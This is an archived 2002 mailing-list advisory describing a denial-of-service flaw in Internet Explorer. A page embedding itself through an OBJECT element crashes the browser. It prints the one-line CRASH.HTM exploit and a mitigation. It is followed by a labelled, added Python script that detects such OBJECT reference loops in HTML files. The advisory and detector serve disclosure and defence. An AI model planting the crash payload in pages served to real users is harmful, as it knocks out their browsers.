DoS in Multiple IE Versions (Self-Referenced Directives)

From: Matthew Murphy (mattmurphyat_private)
Date: Sat Apr 20 2002 - 08:48:43 PDT


    The Flaw
    
        OBJECT elements are used for embedded OLE in HTML documents.  A flaw in
    the way Microsoft Internet Explorer processes this directive allows a page
    that causes a loop in object dependency, or loads itself in a certain manner
    in an OBJECT, to completely crash Internet Explorer.
    
    The Exploit
    
        To date, I have discovered 4 points of exploitation to crash the
    browser.  My favorite example is this one:
    
    ---- [ CRASH.HTM ] ----
    <OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
    ---- [ CRASH.HTM ] ----
    
    IE dies inside shdocvw.dll with a call stack overflow.
    
    Fixes
    
        Set "Run ActiveX Controls and Plugins" to disabled in ALL zones.  An XML
    Island DSO may even be able to get past this, however.  I would expect this
    bug to be fixed in a future IE service pack, though there's been no
    confirmation/details of that from Microsoft.
    
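    A defender-side check for the looping object dependency the post describes, added here as an example and not part of Murphy's post: it collects OBJECT DATA references across a constructed set of local HTML documents and reports any reference cycle, whether a one-file self-reference like CRASH.HTM or a loop spanning several files. It assumes a case-insensitive filesystem (as on Windows) and relative DATA paths only.

```python
"""Detect OBJECT DATA reference loops in a set of HTML documents (added example)."""
from html.parser import HTMLParser
from posixpath import dirname, join, normpath

# Constructed sample site, keyed by lowercase path. crash.htm is the post's one-liner;
# a.htm and sub/b.htm form a two-file loop; safe.htm embeds a non-HTML object.
SITE = {
    "crash.htm": '<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>',
    "a.htm": '<object data="sub/b.htm" type="text/html"></object>',
    "sub/b.htm": '<OBJECT data="../A.HTM" type="text/html"></OBJECT>',
    "safe.htm": '<object data="movie.swf" type="application/x-shockwave-flash"></object>',
}


class ObjectRefParser(HTMLParser):
    """Collect the DATA attribute of every OBJECT element in a document."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so <OBJECT DATA=...> matches too.
        if tag == "object":
            self.refs.extend(v for k, v in attrs if k == "data" and v)


def object_refs(html):
    parser = ObjectRefParser()
    parser.feed(html)
    return parser.refs


def resolve(base, ref):
    """Resolve a relative DATA reference against the referencing document's directory.
    Lowercased because the assumed filesystem is case-insensitive."""
    return normpath(join(dirname(base), ref)).lower()


def find_object_cycle(site, start):
    """Depth-first walk of OBJECT references from `start`; returns the first
    loop found as a list of paths (first element repeated at the end), else None."""
    stack, on_path = [start.lower()], {start.lower()}
    def dfs(doc):
        for ref in object_refs(site.get(doc, "")):
            target = resolve(doc, ref)
            if target in on_path:               # back-edge: the loop IE would follow
                return stack[stack.index(target):] + [target]
            stack.append(target); on_path.add(target)
            found = dfs(target)
            if found:
                return found
            stack.pop(); on_path.discard(target)
        return None
    return dfs(stack[0])


def scan_site(site):
    """Map each document that reaches an OBJECT reference loop to that loop."""
    return {doc: cyc for doc in site if (cyc := find_object_cycle(site, doc))}
```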

    This archive was generated by hypermail 2b30 : Sat Apr 20 2002 - 13:31:23 PDT